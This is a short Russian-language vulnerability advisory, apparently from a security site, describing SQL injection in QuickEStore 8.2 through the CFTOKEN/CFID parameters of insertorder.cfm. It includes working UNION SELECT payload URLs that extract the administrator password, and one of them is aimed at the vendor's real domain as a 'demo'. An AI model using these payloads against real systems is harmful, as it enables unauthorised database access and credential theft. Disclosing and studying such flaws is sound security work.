• Партнер

  • Программа: QuickEStore 8.2

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «CFID» сценарием insertorder.cfm. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

    Примеры:

    http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1[sql query]

    получить пароль администратора:

    http://www.xxx.com/insertorder.cfm?CFID=123&CFTOKEN=1 union select 1,2,3,password,5,6,7,8,9,10,11,12 from params"having 1=1

    Демо (главный сайт 😀 :D):

    http://www.quickestore.com/ppec/insertorder.cfm? CFID=xx&CFTOKEN=1%20union%20select%201,2,3,4,password,6,7,8, 9,10,11,12,13,14,15%20from%20 params%22having%201=1

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии